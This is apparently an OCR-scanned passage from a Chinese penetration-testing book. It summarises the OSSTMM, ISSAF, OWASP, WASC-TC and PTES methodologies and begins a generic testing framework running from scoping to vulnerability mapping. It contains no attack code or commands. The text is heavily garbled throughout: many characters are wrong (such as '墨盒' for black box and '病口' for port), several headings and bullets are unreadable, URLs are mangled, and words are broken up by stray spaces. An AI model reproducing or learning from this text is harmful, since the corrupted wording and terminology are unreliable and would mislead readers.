考虑 成 本 和 效果 的 因素 。 所 以 ， 评 估 策 略 的 峭 选 工作 受到 多 种 因素 的 
制约 。 这 些 因素 包括 与 目标 系统 有 关 的 技术 细 和 和 各 种 资源 、 活 透 人 
员 的 知识 结构 、 业 务 目 标 以 及 法 规 问题 。 以 业务 的 角度 看 ， 效 果 和 成 
本 控制 至 天 重要 。 本 文 介绍 的 这 儿 种 方法 论 ， 在 官方 网 站 上 都 有 非常 
正规 的 详细 说 明文 件 。 在 此 ， 我 们 对 它们 进行 简要 总 结 。 如 需 了 解 详 
细 的 工作 流程 ， 您 需要 亲 目 访问 相关 网 站 ， 仔 细 人 研究 各 种 文件 和 实施 
细则 e 


2.3.1 FF} lint (OSSTMM 


开源 安全 测试 方法 论 (Open Source Security Testing Methodology 
Manual , OSSTMM  ) ( E F 网 站 是 
http://www.isecom.org/research/osstmm.html) 是 由 Pete Herzog 创建 ， 继 
而 由 ISECOM 发 展 的 测试 方法 论 。 它 是 国际 公认 的 安全 测试 和 安全 分 析 
标准 。 很 多 企业 正在 他 们 的 日 常 评 估 工 作 中 应 用 这 一 标准 。 以 技术 的 


角度 看 ， 这 一 方法 论 把 安全 评估 工作 划分 为 4 组 : 范围 (scope) ` fs 
道 (channel) ^ X&5| (index) 和 矢量 (vector) 。“ 范 围 > 指 代 评 估 人 员 
收集 被 测 单位 全 部 资产 相关 信息 的 工作 。* 信 道 ? 则 是 这 些 资产 之 间 的 
通信 方式 和 互动 类 型 ; 包括 物理 方式 、 光 学 方式 和 其 他 方式 的 通信 。 
每 个 信道 都 构成 了 一 套 独 特 的 安全 组 件 ， 都 要 在 评估 阶段 进行 测试 和 
验证 。 这 些 组 件 包括 物理 安全 、 人 类 心理 学 、 数 据 网 络 、 无 线 通 信介 
质 和 电信 设施 。 所 谓 “ 索 引 ”， 泛 指 特定 资产 和 相应 ID 的 对 应 关系 。 例 
如 ， 审 计 人 员 常 常 要 明确 MAC 地 址 和 IP 地 址 的 对 应 关系 ， 就 是 为 了 整 
理 一 种 索引 。 而 “矢量 ” 指 的 是 审计 人 员 访 问 和 分 析 功 能 性 资产 的 方 
式 。 以 上 几 个 部 分 ， 组 成 了 全 面 评估 被 测 开 运营 环境 的 整个 技术 流 
程 ， 被 称 为 审计 范畴 (auditscope) 。 

OSSTMM 的 方法 论 总 结 了 多 种 形式 的 安全 测试 ， 并 将 它们 划分 为 6 
个 标准 种 类 。 

e Bill (blind) : 事先 不 了 解 目 标 系统 的 任何 情况 的 测试 就 是 言 
测 。 然 而 ， 在 评估 过 程 开 始 之 前 ， 被 测 单位 会 知道 何 时 开始 安全 测 
试 。 道 德 黑 客 (Ethical hacking) 和 对 抗 竞赛 (War Gaming) 就 是 典型 
的 盲 测 。 因 为 盲 测 遵循 了 道德 规范 ， 事 先 通知 被 测 单 位 ， 所 以 这 种 测 
试 方法 也 被 广泛 接受 。 

e 双 盲 测试 (double blind) : 在 双 言 测试 中 ， 审 计 人 员 事 先 不 清楚 
目标 系统 的 情况 ， 被 测 单位 事先 也 不 会 知道 将 有 安全 测试 。 墨 盒 审 计 
和 渗透 测试 都 属于 双 盲 测试 。 当 前 绝 大 多 数 的 安全 审计 采用 双 盲 测试 
方法 。 对 于 审计 人 员 来 说 ， 选 择 能 够 胜任 的 最 佳 工 具 和 最 佳 技 术 已 经 
是 一 种 考验 了 。 

e KAM (grey box) : 在 灰 盒 测试 中 ， 审 计 师 仅 了 解 被 测 系 统 
有 限 的 情况 ， 被 测 单位 也 会 知道 审计 开始 和 结束 的 时 间 。 脆 弱 性 评估 
就 属于 灰 盒 测 试 。 


e AKAM (double grey box) : 双 灰 盒 测试 工作 的 方式 类 似 于 
灰 盒 测试 。 只 不 过 在 双 灰 盒 测 试 中 ， 会 给 审计 人 员 定 义 一 个 时 限 ， 而 
且 这 种 测试 不 涉及 信道 测试 和 渗透 矢量 。 日 使 审计 就 属于 双 灰 使 测 
试 。 

e 串联 测试 (tandem) : 在 串联 测试 中 ， 审 计 人 员 对 目标 系统 只 有 
最 低 限 度 的 了 解 ， 而 在 测试 开始 前 他 们 会 通告 被 测 单位 。 需 要 注意 的 
是 ， 串 联 测试 会 测试 得 比较 彻底 。 水 品 盒 测 试 和 内 部 审计 都 是 串联 测 
ABI ° 

e 逆向 测试 (reversal) : 在 逆向 测试 中 ， 审 计 员 充分 了 解 目 标 系 
统 ; 而 被 测 单位 将 永远 不 会 知道 测试 鸭 时 间或 方式 。 

OSSTMM 推 广 的 技术 评估 框架 十 分 灵活 。 即 使 某 个 项 目 在 逻辑 上 
可 分 为 3 个 连续 的 信道 和 5 个 安全 组 件 ， 我 们 照样 可 以 使 用 OSSTMM 的 
框架 评估 其 安全 性 。OSSTMM 体 系 的 测试 方法 ， 通 过 检 碍 访问 控制 安 
全 、 流 程 安全 、 数 据 控 制 、 物 理 位 置 、 周 界 防护 、 安 全 意识 水 平 、 信 
任 关 系 、 反 欺诈 控制 等 诸多 过 程 ， 全 面 评 佑 被 测 单位 的 安全 性 。 总 体 
而 言 ， 这 一 理论 强调 测试 目标 和 测试 方法 ， 注 重 在 测试 前 、 测 试 中 、 
测试 后 应 当 采 用 的 相应 策略 ， 而 且 介 绍 了 解读 和 综合 分 析 测 试 结 果 的 
方法 。 确 切 掌握 目标 系统 当前 的 防护 水 平 至 天 重要 ， 有 关 数 据 十 分 珍 
5t ° OSSTMM 引入 了 RAV (Risk Assessment Value， 风 险 评 估 值 ) 的 概 
念 ， 并 通过 它 曾 述 了 这 一 理论 的 很 多 理念 。RAV 的 基本 功能 是 分 析 测 
斌 结果， 进而 基于 三 个 因素 (运营 安全 、 损 耗 控 制 、 局 限 程度 ， 的 标 
称 值 来 计算 安全 的 标 称 值 。 最 后 求 得 的 这 个 标 称 值 称 为 RAV 得 分 。 在 
引入 RAV 得 分 的 概念 之 后 ， 审 计 人 员 可 以 量化 评估 当前 的 安全 状态 ， 
并 可 为 企业 安全 的 下 一 步 目 标 设 定 里 程 碑 。 从 商业 的 角度 来 看 ，RAV 
有 助 于 优化 安全 投资 ， 并 可 助 您 选择 更 为 有 效 的 安全 解决 方案 。 

主要 特性 与 优势 

OSSTMM 的 主要 特性 与 优势 如 下 。 


e OSSTMM 的 方法 可 从 本 质 上 降低 假 阴 性 和 假 阳 性 的 发 生 率 。 它 
推出 的 测量 方法 具有 普遍 的 应 用 价值 。 

e 该 架构 适用 于 多 种 类 型 的 安全 测试 ， 可 用 于 渗透 测试 、 白 盒 测试 
审计 、 漏 洞 评估 等 其 他 测试 。 

e 它 能 够 确保 每 次 评估 应 进行 得 全 面 彻底 ， 还 能 保证 评估 过 程 的 一 
致 性 、 可 测 性 、 可 靠 性 。 

e 该 方法 本 身 可 分 为 4 个 相对 独立 的 阶段 ， 即 定义 阶段 、 信 息 阶 
段 、 调 志 阶 段 和 控制 测试 阶段 。 每 一 个 阶段 都 会 获取 、 评 估 和 验证 目 
标 环境 中 的 相关 信息 。 

e RAV 的 计算 方法 综合 衡量 了 运营 安全 、 损 耗 控制 、 局 限 程度 的 
情况 。 它 的 计算 结 采 即 RAV 得 分 ， 可 代表 目标 系统 当前 的 安全 状况 。 

e 这 种 方法 的 评估 报告 均 采 用 安全 测试 审计 报告 (STAR, Security 
TestAudit Report) 模板 。 以 这 种 格式 书写 的 报告 同时 适合 被 测 单位 的 
管理 层 和 技术 层 阅 读 ， 有 助 于 他 们 共同 理解 测试 目标 、 风 险 评 估 值 

(RAV) 和 每 个 阶段 的 测试 结果 。 

e 该 方法 定期 更 新 。OSSTMM 会 符合 安全 测试 、 法 规 和 法 规 问 题 
的 新 变化 。 

e OSSTMM 与 行业 法 规 、 企 业 政 策 ， 以 及 政府 法 规 兼容 。 此 外 ， 
官方 认可 的 审计 员 都 是 直接 从 ISECOM (安全 与 开放 式 方法 论 研 究 协 
4) 获取 的 资格 认证 。 


2.3.2 HERE y 


Hi SUL AWRTEASR (Information Systems SecurityAssessment 
Framework, ISSAF)  (www.oissg. org/issaf) 是 另外 一 种 开放 源 代码 
的 安全 性 测试 和 安全 分 析 框 架 。 为 了 解决 安全 评估 工作 的 逻辑 顺序 问 
题 ， 该 框架 已 分 为 若干 个 领域 (domain) 。 不 同 领域 评估 目标 系统 的 
不 同 部 分 ， 而 且 可 以 根据 实际 情况 对 每 个 领域 进行 相应 调整 。 把 这 一 


架构 与 日 常 业务 的 生命 周期 相 结合 ， 可 以 充分 满足 企业 安全 测试 的 准 
确 性 、 完 整 性 、 高 效 性 的 需求 。ISSAF 兼 顾 了 安全 测试 的 技术 方面 和 管 
理 方面 。 在 技术 方面 ， 它 有 一 整套 关键 的 规则 和 程序 ， 形 成 了 一 套 完 
备 的 评估 程序 。 在 管理 方面 ， 它 明确 了 在 整个 测试 过 程 中 应 当 遵 循 的 
管理 要 则 和 最 佳 实践 。 应 当 注 意 ，ISSAF 主 张 安全 评估 是 一 个 过 程 ， 而 
不 是 一 次 审计 。 审 计 框 架 应 当 分 为 计划 、 评 估 、 人 修复、 评审 以 及 维护 
阶段 ， 应 当 有 更 为 完善 的 标准 。 然 而 ISSAF 具 有 灵活 和 高 效 的 特点 ， 是 
审计 工作 各 个 阶段 的 通用 准则 ， 可 适用 于 所 有 企业 结构 。 

这 一 框架 的 交付 报告 分 为 业务 活动 、 安 全 措施 、 目 标 系统 中 可 能 
存在 的 安全 弱点 的 完整 清单 。 其 评 佑 过程 注重 分 析 被 测 单位 最 容易 被 
利用 的 关键 漏洞 ， 侧 重 于 以 通过 最 短路 径 尽 快 完 成 测试 任务 。 

ISSAF 的 技术 评估 基准 十 分 全 面 ， 可 用 于 测试 各 种 技术 和 不 同 流 
程 。 不 过 ， 丰 富 的 内 容 带 来 了 一 大 副作用 ， 即 要 跟 上 评估 领域 的 技术 
变化 速度 ， 这 一 框架 区 需要 频 和 党 更 新 。 相 对 而 言 ，OSSTMM 受 技术 更 
新 影响 的 幅度 略 小 。 即 使 审计 人 员 使 用 不 同 的 工具 和 全 新 的 技术 ， 他 
们 遵循 的 方法 论 却 基本 不 变 。 虽 然 如 此 ， 但 是 ISSAF 仍 然 号 称 是 由 最 新 
的 安全 工具 、 最 佳 实践 ， 以 及 补充 安全 评估 计划 的 管理 理念 所 组 成 的 
广泛 框架 。 它 也 可 以 和 OSSTMM 或 其 他 测试 方法 论 一 起 使 用 ， 从 而 能 
够 兼 有 各 种 方法 的 优点 。 

主要 特性 与 优势 

ISSAF 的 主要 特性 与 优势 如 下 。 

e ISSAF 主要 测试 当前 安全 控制 措施 中 的 严重 漏洞 ， 所 以 它 在 保障 
系统 安全 方面 的 意义 重大 。 

e 它 关 注 信息 安全 范畴 内 的 各 个 关键 领域 ， 泗 盖 了 风险 评 佑 、 业 务 
结构 和 管理 、 控 制 评估 、 服 务 管 理 、 安 全 策略 的 开发 和 常规 的 最 佳 实 
EX ° 


e ISSAF 渗透 测试 方法 论 评估 了 网络、 系统 或 应 用 程序 的 安全 性 。 应 
用 该 框架 可 以 无 阻碍 地 把 精力 重点 放 在 特定 技术 上 ， 如 路 由 器 、 交 换 
机 、 防 火 墙 、 入 侵 检 测 和 防御 系统 、 存 储 区 域 网 络 、 虚 拟 专 用 网 络 、 
各 种 操作 系统 、Web 应 用 服务 器 、 数 据 库 等 。 

e 通过 必要 的 控制 和 处 理 ， 它 可 以 统一 技术 层 和 管理 层 这 两 方面 人 
员 对 安全 测试 的 理解 。 

e 它 可 帮助 管理 人 员 理解 当前 边界 防御 体系 的 现 有 风险 ， 并 可 指出 
可 能 影响 业务 完整 性 的 安全 弱点 ， 从 而 帮助 人 们 主动 地 减少 风险 。 

可 同时 结合 OSSTMM 和 ISSAF 两 种 理论 评估 企业 环境 的 安全 状 
ES 

2.3.3 式 Web 应 用 程 项 


开放 式 Web 应 用 程序 安全 项 目 (Open Web Application Security 
Project, OWASP) 定期 推出 其 top 10 project ( 排名 前 十 位 的 安全 隐患 
防护 守则 ) 以 提高 公共 对 应 用 安全 的 认 知 意识 。 这 个 项 目 公 开 了 编写 
安全 程序 所 需 遵循 的 各 种 原则 和 惯例 。OWASP 的 测试 项 目 

( https://www.owasp.org/index.php/owasp- Testing Project) 公布 了 一 套 
非常 实用 的 安全 测试 指南 。 您 应 当 仔细 阅读 这 部 分 内 容 ， 因 为 这 个 测 
试 框架 往往 可 以 指导 您 的 工作 。 

OWASP 的 Top 10 Project 总 结 了 各 种 攻击 矢量， 按照 各 种 隐患 可 能 
在 技术 上 和 业务 上 造成 的 危害 ， 对 影响 应 用 安全 的 风险 进行 分 类 和 排 
名 。 在 评估 应 用 程序 安全 时 ， 这 些 排名 前 十 的 安全 风险 揭露 了 普遍 存 
在 于 各 种 技术 和 平台 的 通用 攻击 方法 。 它 还 前 述 了 测试 、 验 证 和 修补 
应 用 程序 安全 弱点 的 具体 方法 。 尽 管 Top 10 Project 揭 示 了 安全 领域 的 高 
风险 问题 ， 但 是 这 10 种 风险 也 只 是 web 应 用 程序 安全 性 问题 的 一 部 分 而 
已 。 尽 管 如 此 ，OWASP 社 区 的 很 多 指南 仍然 可 以 指导 开发 人 员 和 安全 
审计 人 员 有 效 地 管理 Web 应 用 程序 的 安全 。 


e 测试 指南 : https;//www.owasp.org/index.php/OWASP Testing- 
Guide v3 Table of Content ° 

e 开发 人 员 指 南 : https;//www.owasp.org/index.php/Guide ° 

e 代码 审查 指南 : https//www.owasp.org/index.php/Category: 
OWASP Code Review. Project ° 

OWASP 的 Top 10 Project 每 年 都 会 更 新 。 如 需 获 取 详 细 信 息 ， 请 访 
[Fl] 这 4 项 目 的 H Jj 网 站 
https://www.owasp.org/index.php/Category:OWASP Top Ten Project ° 

主要 特性 与 优势 

OWASP 的 主要 特性 与 优势 如 下 。 

e OWASP 推出 了 Web 应 用 程序 的 十 大 安全 风险 的 测试 方法 。 应 用 
这 些 方法 ， 可 使 应 用 程序 避免 出 现 常 见 的 安全 缺陷 ， 人 免 受 常见 攻击 的 
和 危害， 进而 巩固 了 应 用 程序 的 保密 性 、 完 整 性 和 可 用 性 。 

e OWASP 社区 研发 出 大 量 安全 工具 ， 这 些 工 具 可 辅助 进行 自动 或 
手动 的 Web 应 用 程序 测试 。Kali Linux 收录 了 其 中 较为 著名 的 程序 ， 如 
WebScarab、Wapiti、JBroFuzz 和 SQLiX 等 。 

e 在 网 络 基础 设施 的 安全 评估 方面 ，OWASP 测试 指南 为 您 提供 了 
特定 技术 的 评估 细则 。 举 例 来 说 ， 它 的 甲骨 文 (Oracle) 的 测试 方法 与 
MySQL 的 测试 方法 瓯 各 有 针对 性 。 该 指南 采用 多 种 相互 关联 的 方法 评 
估 各 种 技术 ， 有 助 于 审计 人 员 因 地 制 宜 地 制定 测试 方法 。 

e CHWARA NERA AAEE ATA TREE o 
这 能 提高 应 用 程序 的 健全 性 、 安 全 性 ， 并 能 减少 程序 中 的 错误 。 

e 它 在 业内 的 认可 度 和 知名 度 屈指 可 数 。 寿 把 排名 前 十 位 的 安全 隐 
患 防护 守则 与 其 他 Web 应 用 程序 安全 评估 标准 结合 使 用 ， 您 可 同时 满足 
一 个 以 上 的 安全 标准 。 


2.3.4 Webs e 


只 有 彻底 、 严 格 的 测试 流程 ， 才 能 发 现 应 用 程序 的 安全 隐患 ， 而 
这 些 测试 流程 完全 可 以 纳入 软件 的 开发 生命 周期 。Web 应 用 安全 联合 
威胁 分 类 (Web Application Security Consortium Threat Classification, 
WASC-TC) 是 这 样 的 一 个 评估 Web 应 用 程序 安全 性 的 开放 标准 。 与 
OWASP 标 准 相似 ， 它 也 从 攻击 和 弱点 两 方面 讨论 安全 问题 ， 但 这 一 标 
准 以 更 为 深入 的 方式 解决 安全 隐患 。 要 识别 、 验 证 应 用 程序 所 面临 的 
各 种 威胁 ， 束 要 这 循 标准 化 的 工作 流程 。WASC-TC 可 以 了 迅速 适用 于 各 
种 技术 环境 ， 有 着 显著 的 易 用 性 。 整 体 上 说 ， 它 能 够 帮助 开发 人 员 和 
安全 审计 人 员 以 不 同 的 视图 了 解 Web 应 用 程序 面临 的 安全 威胁 。 

e 枚 举 视图 枚 举 视图 是 分 析 Web 应 用 程序 攻击 手段 和 相应 安全 
弱点 的 基础 。 它 从 定义 、 类 型 和 多 种 编程 平台 的 实例 这 几 个 角度 ， 详 
细 讨 论 了 每 种 攻击 手段 和 每 个 安全 弱点 。 另 外 ， 所 涉及 的 安全 弱点 和 
攻击 手段 都 被 分 配 了 唯一 的 识别 编号 ， 以 便于 人 们 引用 。 目前， 这 个 
视图 里 总 共有 49 个 WASC-ID 号 码 (1~49) 。 这 些 编号 并 不 代表 相应 条 
目的 危害 程度 ， 仅 仅 是 为 了 方便 引用 而 分 配 的 编号 。 

e 开发 视图 : 开发 视图 关联 分 析 外 部 的 攻击 和 程序 内 部 的 安全 弱 
点 ， 将 开发 人 员 的 视野 转向 程序 自身 的 漏洞 。 这 一 分 析 适 用 于 开发 周 
期 的 三 个 阶段 ， 即 设计 、 实 现 (编程 ，、 部 署 阶段 。 如 果 在 明确 应 用 
程序 的 需求 时 没有 充分 考虑 安全 方面 要 求 ， 就 会 在 研发 周期 的 初期 阶 
段 引 发 漏洞 ， 形 成 设计 阶段 的 安全 弱点 。 不 安全 的 编程 规则 或 不 当 的 
惯例 产生 会 造成 实现 阶段 的 安全 弱点 。 无 论 在 应 用 程序 、Web ARS 88 
或 是 其 他 外 部 系统 的 配置 过 程 中 哪个 部 分 出 现 差 错 ， 最 终 都 会 导致 部 
属 阶段 的 安全 弱点 。 可 见 ， 这 个 视图 以 最 佳 安全 实践 为 蓝本 ， 提 出 了 
将 安全 保障 措施 融入 到 日 常 的 研发 生命 周期 的 具体 方法 。 

e 交叉 引用 视图 : 这 个 视图 关联 地 分 析 了 多 种 web 应 用 安全 标 
准 。 通 过 对 该 视图 的 引用 ， 审 计 人 员 和 开发 团队 能 够 把 当前 所 使 用 的 
标准 中 的 术语 〈 标 准 条 款 ) 与 其 他 标准 的 相应 内 容 进 行 对 照 分 析 。 如 


此 一 来 ， 只 需要 较 少 的 开销 ， 就 可 以 让 一 个 项 目 同时 符合 多 种 不 同 的 
安全 标准 。 因 为 不 同 的 应 用 程序 安全 标准 会 从 不 同 的 角度 评估 应 用 程 
序 的 安全 性 ， 所 以 它们 衡量 同一 的 风险 的 评估 指标 也 不 尽 相 同 。 因 
此 ， 要 对 不 同安 全 标准 进行 差异 性 分 析 ， 才 能 够 正确 地 计算 安全 风险 
及 其 严重 程度 。 当 前 WASC-TC 中 的 攻击 方法 和 薄弱 环节 ， 可 以 映射 到 
OWASP 的 Top 10 Project、Mitre 通 用 缺陷 列表 (Common Weakness 
Enumeration, CWE) ^ Mitre 通用 攻击 模式 列表 和 分 类 (Common 
Attack Pattern Enumeration and Classification, CAPEC) ^ SANS-CWE 
排名 前 25 的 软件 高 危 错误 列表 (SANS-CWE Top 25 list) ° 

Mitre's CWE 的 官方 网 站 是 https://cwe.mitre.org/。 

Mitre's CAPEC 的 官方 网 站 是 http:Wcapec.mitre.org/。 

SANS-CWE 的 排名 前 25 的 软件 高 危 错误 列表 的 发 布 网 站 十 
http://www.sans.org/top25-software-errors/ ° 

如 需 详 细 了 解 WASC-TC 及 其 评论 ， 请 访问 官方 网 站 : 
http://projects.webappsec.org/Threat-Classification ° 

主要 特性 与 优势 

WASC 一 TC 的 主要 特性 与 优势 如 下 。 

e WASC 一 TC 围绕 常见 攻击 和 常规 弱点 这 一 中 心 ， 深 入 讨论 了 
Web 应 用 程序 运营 系统 的 安全 评估 方法 。 

e 无 论 何 种 Web 应 用 程序 平台 ， 都 可 使 用 Kali Linux 的 工具 集 验 
证 、 测 试 WASC 一 TC 提出 的 常见 攻击 和 闸 规 轮 点 。 

e 它 提 出 了 三 种 不 同 视 图 ， 即 枚 举 视图 、 开 发 视图 和 交叉 引用 视 
图 。 枚 举 视图 起 到 了 基础 数据 库 的 作用 ， 它 列举 了 在 Web 应 用 中 所 有 
可 能 被 发 现 的 攻击 方法 和 安全 弱点 。 开 发 视图 将 这 些 攻击 方法 和 安全 
弱点 进行 天 联 分 机 ， 整 理 成 一 系列 漏洞 ， 并 根据 它们 在 开发 过 程 中 的 
出 现 阶 段 进行 分 类 。 而 开发 阶段 又 可 分 为 设计 阶段 、 实 现 阶段 和 部 署 


阶段 。WASC-TC 标准 的 交叉 引用 视图 用 于 对 照 、 引 用 其 他 的 应 用 程序 
安全 标准 。 

e WASC-TC 标准 已 经 得 到 了 业界 的 广泛 认可 。 在 许多 开源 和 商业 
解决 方案 里 ， 特 别 是 漏洞 评估 和 管控 产品 中 ， 都 能 看 到 WASC-TC 的 续 
影 。 

e WASC-TC 也 可 以 和 其 他 著名 的 应 用 安全 标准 兼容 ， 例 如 OWASP 
和 SANS-CWE。 


2.4 渗透 测试 执行 标准 


渗透 测试 执行 标准 (Penetration Testing Execution Standard , 
PTES) 的 先驱 都 是 渗透 测试 行业 的 精英 。 这 个 标准 由 渗透 测试 7 个 阶段 
的 标准 组 成 ， 可 在 任意 环境 中 进行 富有 成 果 的 渗透 测试 。 它 的 官方 网 
站 详细 介绍 了 有 具体 测试 方法 ， 有 兴趣 的 读者 可 访问 http://www. pentest- 
standard.org/index.php/Main Page ° 

根据 这 一 标准 ， 标 准 的 渗透 测试 可 以 分 为 下 述 7 个 阶段 ; 

e 事前 互动 ; 

e 情报 收集 ; 

e 威胁 建 模 ; 

e 漏洞 分 析 ; 

e 漏洞 利用 ; 

e 深度 利用 ; 

e 书面 报告 。 

PTES 的 官方 网 站 详细 介绍 了 每 个 阶段 的 思维 导 图 (mind maps) 
和 组 成 步 又。 这 些 内 容 有 助 于 审计 人 员 根 据 被 测 环境 的 测试 要 求 ， 对 
PTES 标 准 进 行 相 应 调整 。 只 要 在 其 官方 网 站 上 点 击 思维 导 图 的 构成 万 
点 ， 束 可 详细 得 看 该 和 点 的 各 个 组 成 步骤 。 


主要 特性 与 优势 

PTES 的 主要 特性 与 优势 如 下 。 

e 它 是 非常 全 面 的 渗透 测试 框架 ， 泗 盖 了 渗 通 测 试 的 技术 方面 和 其 
他 重要 的 方面 ， 如 范围 葛 廷 (scope creep) 、 报 告 ， 以 及 渗透 测试 人 员 
你 护 目 身 的 方法 。 

e 它 介绍 了 多 数 测 试 任务 的 具体 方法 ， 可 指导 您 准确 测试 目标 系统 
的 安全 状态 。 

e 它 汇 具 了 多 名 日 行 一 “ 渗 ” 的 渗透 测试 专家 的 下定 经 验 。 

e 它 包 含 了 最 常用 的 以 及 很 罕见 的 相 天 技术 。 

e 它 浅 显 易 懂 ， 您 可 根据 测试 工作 的 需要 对 相应 测试 步骤 进行 调 
HO o 


2.5 通用 渗透 测试 框架 


Kali Linux 属于 通用 型 操作 系统 ， 它 配备 有 多 种 安全 评估 工具 和 渗 
透 测 试 工具 。 在 没有 合适 的 测试 理论 指导 的 情况 下 冒 然 使 用 这 些 工 
具 ， 可 能 会 导致 测试 失败 ， 测 试 结 果 可 能 无 法 让 人 满意 。 因 此 ， 从 技 
术 管 理 的 角度 来 看 ， 遵 循 正规 的 测试 框架 对 安全 测试 极为 重要 。 

这 一 小 节 将 通过 黑 盒 测试 的 具体 方法 和 白 盒 测试 的 通用 测试 方法 
介绍 通用 测试 框架 。 它 涵盖 了 典型 的 审计 测试 工作 和 渗透 测试 工作 会 
涉及 到 的 各 个 阶段 。 评 估 人 员 可 以 根据 被 测 目 标的 具体 情况 对 上 述 测 
试 方法 进行 相应 调整 。 这 一 方法 论 由 一 系列 相关 步骤 所 组 成 。 要 想 成 
功 完 成 安全 评估 项 目 ， 必 须 在 测试 的 初始 化 阶段 、 测 试 进 行 阶段 以 及 
测试 结束 阶段 全 面 遵循 这 些 步 又。 这 些 步 骤 包 括 : 

e 范围 界定 ; 

e 信息 收集 ; 

e 目标 识别 ; 


e 服务 枚 举 ; 

e 漏洞 映射 ; 

ete LEY; 

e 漏洞 利用 ; 

e 提升 权限 ; 

e 访问 维护 ; 

e 文档 报告 。 

无 论 是 进行 日 盒 测 试 还 是 墨盒 测试 ， 选 择 和 使 用 测试 步骤 都 是 测 
试 人 员 的 责任 。 在 测试 开始 前 ， 测 试 人 员 需 要 根据 目标 系统 的 实际 环 
境 和 已 掌握 的 天 于 目标 系统 的 情况 ， 制 定 最 佳 的 测试 策略 。 下 文 将 会 
介绍 每 一 个 测试 阶段 ， 包 括 它 们 的 简要 描述 、 定 义 和 可 能 适用 的 应 用 
程序 。 虽 然 这 种 通用 测试 方法 论 可 以 配合 其 他 的 方法 论 同 时 使 用 ， 但 
是 它 只 是 一 种 指导 建议 ， 而 不 是 全 能 的 渗透 测试 解决 方案 。 

在 开始 技术 性 安全 评估 之 前 ， 务 必要 观察 、 研 究 目标 环境 的 被 测 
范围 。 同 时 还 要 了 解 ， 这 个 范围 率 扯 到 多 少 个 单位 ， 是 单个 单位 还 是 
多 个 单位 会 参与 到 安全 评估 的 工作 中 来 。 在 范围 界定 阶段 ， 需 要 考虑 
的 典型 因素 如 下 。 

e 测试 对 象 是 什么 ? 

e 应 当 采 取 何 种 测试 方法 ? 

e 有 哪些 在 测试 过 程 中 需要 满足 的 条 件 ? 

e 哪些 因素 可 能 会 限制 测试 执行 的 过 程 ? 

e 需要 多 入 才能 完成 测试 ? 

e 此 次 测试 应 当 达 成 什么 任务 目标 ? 

审计 人 员 只 有 确切 理解 被 评估 系统 所 使 用 的 技术 ， 理 解 其 基本 功 
， 以 及 相关 技术 与 网 络 之 间 的 相互 影响 ， 才 能 成 功 达 成 渗透 测试 的 
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目标 。 因 此 ， 无 论 是 进行 什么 类 型 的 安全 评估 项 目 ， 审 计 人 员 的 知识 
结构 都 将 起 着 至 关 重 要 的 作用 。 
2.5.2 信息 收集 

在 划 定 了 测试 范围 之 后 ， 就 需要 进入 信息 收集 阶段 。 在 这 个 阶 
段 ， 渗 透 测 试 人 员 需 要 使 用 各 种 公开 资源 尽 可 能 地 获取 测试 目标 的 相 
天 信息 。 他 们 从 互联 网 上 搜集 信息 的 互联 网 渠道 主要 有 : 

e 论坛 ; 

e 公告 板 ; 

e 新 闻 组 : 

e 媒体 文章 ; 

e 博客 ， 

e 社交 网 络 ; 

e 其 他 商业 或 非 商 业 性 的 网 站 。 

此 外 ， 他 们 也 可 借助 各 种 搜索 引擎 中 获取 相关 数据 ， 例 如 谷歌、 
雅虎 、MSN 必 应 、 百 度 等 。 进 一 步 说 ， 审 计 人 员 可 以 使 用 Kali Linux 收 
录 的 各 种 工具 在 测试 目标 的 网 络 系统 里 挖掘 信息 。 这 些 运用 漏洞 数据 
挖掘 技术 的 工具 能 够 收集 可 观 信息 ， 包 括 DNS 服 务 器 、 路 由 关系 、 
whois 数 据 库 、 电 子 邮 件 地 址 、 电 话 号 码 、 个 人 信息 以 及 用 户 账 户 。 收 
集 到 的 信息 越 多 ， 渗 透 测试 成 功 的 概率 就 越 高 。 

2.5.3 目标 识别 

这 个 阶段 的 主要 任务 是 识别 目标 的 网 络 状态 、 操 作 系 统 和 网 络 架 
构 。 该 阶段 工作 旨 在 完整 地 展现 目标 网 络 里 各 种 联网 设备 或 技术 的 完 
整 关 系 ， 以 帮助 测试 人 员 在 接 下 来 的 工作 里 枚 举目 标 网 络 的 各 种 服 
务 。Kali Linux 提供 的 一 系列 先进 的 网 络 工 具 ， 可 以 轻松 探测 到 联网 主 
机 ， 识 别 这 些 主机 运行 的 操作 系统 ， 并 根据 每 个 设备 在 网 络 系统 中 的 
不 同 角 色 对 它们 进行 归 类 。 这 些 工具 通常 采用 了 基于 上 层 网 络 协议 的 


主动 和 被 动 的 检测 技术 。 它 们 能 够 通过 不 同 的 方式 巧妙 地 利用 各 种 协 
议 获 取 许 多 有 用 的 信息 ， 比 如 操作 系统 指纹 等 。 
2.5.4 服务 枚 举 

这 一 阶段 会 根据 前面 各 个 阶段 的 成 果 ， 进 一 步 找 出 目标 系统 中 所 
有 开放 的 病 口 。 一 旦 找到 了 所 有 开放 的 病 口 ， 束 可 以 通过 这 些 端 口 来 
列 出 目标 系统 上 运行 的 服务 。 有 很 多 扫描 端口 的 技术 ， 如 全 开 (full- 
open) 扫描 、 半 开 (half-open) JA ^ ES (stealth) 扫描 等 。 这 些 
技术 都 可 用 来 检测 端口 的 开放 情况 ， 甚 至 可 以 扫描 处 于 防火 墙 或 者 入 
侵 检 测 系 统 保护 下 的 主机 。 主 机 上 开放 的 端口 都 有 相应 的 服务 程序 ， 
对 这 些 信息 进行 深度 分 析 之 后 ， 可 进一步 发 掘 目标 网 络 基 础 设施 中 可 
能 存在 的 漏洞 。 因 此 ， 这 个 阶段 为 其 后 的 测试 工作 打下 了 基础 ， 有 助 
于 测试 人 员 继 而 发 现 各 种 网 络 设备 上 可 能 会 造成 严重 危害 的 安全 漏 
洞 。Kali Linux 收 孙 的 部 分 目 动 化 工具 可 以 辅助 审计 人 员 完 成 这 一 阶段 
的 目标 。 


至 此 为 止 ， 我们 已 经 充分 收集 了 目标 网 络 的 各 种 信息 。 接 下 来 ， 
我 们 束 可 以 根据 已 经 发 现 的 开放 端口 和 服务 程序 ， 碍 找 、 分 析 目 标 系 
统 中 存在 的 漏洞 。Kali Linux 系统 中 提供 的 一 系列 目 动 化 的 网 络 和 应 用 
漏洞 评估 工具 可 以 担任 完成 这 个 阶段 的 任务 。 当 然 ， 人 工 (手动 ) 完 
成 这 些 任 务 未 演 不 可 ， 只 是 人 工 操作 极为 耗 时 ， 而 且 需 要 有 关 人 员 拥 
有 专家 级 的 知识 。 但 是 ， 如 采 能 够 将 目 动 和 手动 这 两 种 不 同 的 测试 方 
法 结合 起 来 ， 审 计 人 员 对 目标 系统 的 认 知 束 会 更 为 清晰 、 透 彻 ， 并 能 
